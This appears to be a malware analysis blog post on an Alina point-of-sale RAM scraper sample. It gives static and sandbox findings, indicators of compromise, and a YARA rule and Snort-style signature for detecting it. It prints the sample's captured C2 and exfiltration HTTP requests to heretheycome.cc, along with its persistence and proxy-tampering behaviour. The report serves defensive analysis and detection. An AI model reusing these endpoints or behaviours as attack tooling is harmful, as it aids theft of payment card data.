Source: VirusShare Malware Family: RAM Scraper Static Analysis Tools: pestudio, CFF Explorer, PEID, BinText, IDA Pro Dynamic Analysis Tools: pexplorer, ProcMon, RegShot, ProcDump, Autoruns, Wireshark, Sandboxie, Comodo Reports: (1) Comodo: http://camas.comodo.com/cgi-bin/submit?file=982c4ea6ca4e613aaa48adf8375e312d2b029c2beba174071c4b5668cf0a8649 (2) VirusTotal: https://www.virustotal.com/en/file/982c4ea6ca4e613aaa48adf8375e312d2b029c2beba174071c4b5668cf0a8649/analysis/1451169207/ I . Static Analysis: File type: Win32 EXE Target machine: Intel 386 or later processors and compatible processors Compilation Timestamp: 2014-09-01 15:39:26 Entry Point: 0x0000CC65 Number of Sections: 5 MD5: 033aac4079addea23bc4e00833cfa8d4 SHA256: 982c4ea6ca4e613aaa48adf8375e312d2b029c2beba174071c4b5668cf0a8649 File size: 161.5 KB (165376 bytes) PDB: "C:\Users\Adminstrator\Desktop\New Alina\alina\Release\alina.pdb" Detection ratio: 46 / 53 PE imports: [+] ADVAPI32.dll [+] CRYPT32.dll [+] KERNEL32.dll [+] SHELL32.dll [+] SHLWAPI.dll [+] USER32.dll [+] WININET.dll [+] WS2_32.dll [+] URLMON.dll Red Flags: The file fingerprints for Web browsers. The file fingerprints for Email clients. The count (9) of Registry functions reached the maximum (1) threshold. The count (15) of Memory Management functions reached the maximum (1) threshold. The count (5) of Tool Help functions reached the maximum (1) threshold. The count (3) of Error Handling functions reached the maximum (1) threshold. The count (5) of Debugging functions reached the maximum (1) threshold. The count (11) of Console functions reached the maximum (1) threshold. The count (11) of WinINet functions reached the maximum (3) threshold. The count (15) of Dynamic-Link Library functions reached the maximum (1) threshold. The count (45) of Process and Thread functions reached the maximum (1) threshold. The count (5) of SEH functions reached the maximum (1) threshold. The count (25) of File Management functions reached the maximum (1) threshold. The file is scored (46/53) by virustotal. The count (246) of blacklisted strings reached the maximum (30) threshold. The count (10) of deprecated imported functions reached the maximum (5) threshold. The count (94) of imported blacklisted functions reached the maximum (1) threshold. The count (7) of antidebug imported functions reached the maximum (1) threshold. The file modifies the registry. The file references child Processes. The file references Inter-Process Communication (IPC). The file opts for Address Space Layout Randomization (ASLR) as mitigation technique. The file checksum (0x00000000) is invalid. The file has no Version. The debug file name (alina.pdb) is different than the file name (982c4ea6ca4e613aaa48adf8375e312d2b029c2beba174071c4b5668cf0a8649). The file is not signed with a Digital Certificate. The file contains CRC crypto strings. II. Dynamic Analysis: Incident Response Remote Access Contains a remote desktop related string Spyware/Leak POSTs files to a webserver Platform Intelligence Sample contains signature combinations unique to malicious reports combo: POSTs files to a webserver Marks file for deletion Contains ability to enumerate processes/modules/threads combo: *POSTs files to a webserver combo *Uses a User Agent typical for browsers, although no browser was ever launched Modifies proxy settings combo *Marks file for deletion *Uses a User Agent typical for browsers, although no browser was ever launched *Contains ability to query CPU information *Queries sensitive IE security settings *Uses a User Agent typical for browsers, although no browser was ever launched *Uses a User Agent typical for browsers, although no browser was ever launched *Alters Software Policy Settings *Alters System Certificates Settings combo Marks file for deletion Contacts Mail Related Domain Names Contains ability to download files from the internet Spyware/Information Retrieval Establishes persistence at Software\Microsoft\Windows\CurrentVersion\Run Whitelists the following processes during the RAM scraping fucntion Here are some interesting strings: Accesses potentially sensitive information from local browsers
details: "<Input Sample>" had access to "%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5" (Type: "FileHandle", Context: "NtSetInformationFile") source: Touched Handle Anti-Reverse Engineering Contains ability to register a top-level exception handler (often used as anti-debugging trick) details: [email protected] at PID 00003868 Anti-Detection/Stealthyness Queries the internet cache settings (often used to hide footprints in index.dat or internet cache) details: "<Input Sample>" (Access type: "QUERYVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE", Key: "SCAVENGECACHEFILELIMIT") Cryptographic Related Contains key cryptographic functions of the CryptoAPI details: [email protected] at PID 00003868 Environment Awareness Contains ability to query the machine version details: [email protected] at PID 00003868 Possibly tries to detect the presence of a debugger details: [email protected] at PID 00003868 Queries volume information details: "<Input Sample>" queries volume information of "Z:\share" (Referenced in the context of a system call) source: API Call General POSTs files to a webserver details: "POST /alinew/loading.php HTTP/1.1 Accept: application/octet-stream Content-Type: application/octet-stream Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1 Eagle Special v12 -> 1.1 Host: heretheycome.cc Content-Length: 427 Cache-Control: no-cache" with no payload source: Network Traffic Uses a User Agent typical for browsers, although no browser was ever launched details: Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1 Eagle Special v12 -> 1.1 System Destruction Marks file for deletion details: "%SAMPLEDIR%\982c4ea6ca4e613aaa48adf8375e312d2b029c2beba174071c4b5668cf0a8649.exe" marked "%APPDATA%\Install\winfax12.exe" for deletion source: API Call System Security Modifies Software Policy Settings details: "<Input Sample>" (Access type: "CREATE", Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA") source: Registry Access Modifies proxy settings details: "<Input Sample>" (Access type: "SETVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYENABLE", Value: "00000000") Queries sensitive IE security settings details: "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY", Key: "DISABLESECURITYSETTINGSCHECK") Unusual Characteristics Contacts Mail Related Domain Names details: "mail.strongboltmail.com" is probably a mail server source: Network Traffic Suspicious and POS scraping APIs details DeleteFileA LoadLibraryW GetProcAddress GetVersionExA GetTickCount ReadProcessMemory GetFileSize ConnectNamedPipe WriteFile DisconnectNamedPipe CreateFileW CreateToolhelp32Snapshot GetModuleFileNameA Process32Next CopyFileA CreateDirectoryA OutputDebugStringW GetModuleFileNameW TerminateProcess CreateProcessA GetFileAttributesA Sleep OpenProcess Process32First CreateFileA GetComputerNameA GetModuleHandleExW CreateThread ExitThread LoadLibraryExW IsDebuggerPresent GetCommandLineA UnhandledExceptionFilter GetStartupInfoW GetModuleHandleW RegCloseKey RegOpenKeyExW RegOpenKeyExA InternetCloseHandle InternetConnectA InternetReadFile HttpSendRequestA InternetOpenA HttpQueryInfoA URLDownloadToFileA socket (Ordinal #23) recv (Ordinal #16) send (Ordinal #19) closesocket (Ordinal #3) WSAStartup (Ordinal #115) connect (Ordinal #4) Informative Anti-Reverse Engineering Found strings in conjunction with a procedure lookup that resolve to a known API export symbol details: Found reference to API [email protected] at PID 00003868 ( Environment Awareness Contains ability to query machine time details: [email protected] at PID 00003868 General Contacts domains details: "heretheycome.cc" "mail.strongboltmail.com" source: Network Traffic Contacts server details: "23.253.126.58:80" "111.90.144.72:465" source: Network Traffic Contains PDB pathways details: "%USERPROFILE%\Desktop\New Alina\alina\Release\alina.pdb" source: String GETs files from a webserver details: "GET /alinew/cinp.php?cmd=1 HTTP/1.1 Accept: Accept-Charset: utf-8; Host: heretheycome.cc Cache-Control: no-cache" source: Network Traffic Installation/Persistance Dropped files details: "ntfs.dat" has type "ASCII text, with no line terminators" source: Dropped File Network Related Found potential URL in binary/memory details: Pattern match: "http://%s:%d{[!4" Heuristic match: "heretheycome.cc" Heuristic match: "[email protected]" Heuristic match: "[email protected]" Heuristic match: "mail.strongboltmail.com" source" String III. Yara Signature: rule Backdoor_Win32_Alina : BDR/SCRP { meta: author = "Vitali Kremez" date = "2015-12-26" description = "Detected Alina BackDoor/Scraper" hash0 = "033aac4079addea23bc4e00833cfa8d4" sample_filetype = "exe" strings: $pdb = “C:\\Users\\Administrator\\Desktop\\New Alina\\alina\\Release\\alina.pdb $string0 = "winfax2.exe" $string1 = " /alinew/loading.php " $string2 = "2.16.840.1.113730.4.1" $string3 = "GetUserObjectInformationW" $string4 = "- Attempt to initialize the CRT more than once." wide $string5 = "address_family_not_supported" $string6 = "InitSecurityInterfaceA" $string7 = "bad file descriptor" $string8 = "firefox.exe" $string9 = "http://" $string10 = "omni callsig'" $string11 = "ntfs.dat" $string12 = "UNICODE" wide $string13 = "no space on device" $string14 = " heretheycome.cc " $string15 = "UTF-16LE" $string16 = " <trustInfo xmlns" $string17 = "Bja-JP" wide condition: 6 of them or any of ($pdb) and filesize<162KB } Sourcefire Rule: alert tcp any any -> any any (msg:" Alina POS Backdoor Alert"; flow:to_server,established; content:”/alinew/cinp.php?cmd=1”; “/alinew/loading.php”;“heretheycome.cc”; “mail.strongboltmail.com”;“Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1 Eagle Special v12”; noncase; pcre: “/.*(alinew)*./; pcre: ”/ .*(cinp.php?cmd=1| loading.php).*/”; classtype: Trojan-activity)
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
September 2016
Categories |